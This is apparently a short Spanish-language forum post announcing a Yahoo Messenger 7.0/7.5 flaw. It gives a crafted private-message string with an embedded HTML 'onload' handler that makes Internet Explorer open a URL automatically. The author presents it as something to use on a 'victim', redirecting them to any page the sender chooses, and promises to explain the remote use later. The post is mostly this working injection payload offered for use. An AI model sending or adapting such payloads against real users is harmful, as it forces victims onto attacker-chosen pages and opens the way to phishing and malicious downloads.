Acabo de encontrar otra vulnerabilidad del yahoo messenger. Si ustedes ponen este codigo en un mensaje privado de yahoo messenger www.google.com es abierto por el internet explorer instantaneamente.


helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(


Obviamente es posible realizar esta vulnerabilidad en forma remota haciendo que la victima entre a la pagina que nosotros querramos. :-) Después les explico como.
Testeado en versiones 7.0/7.5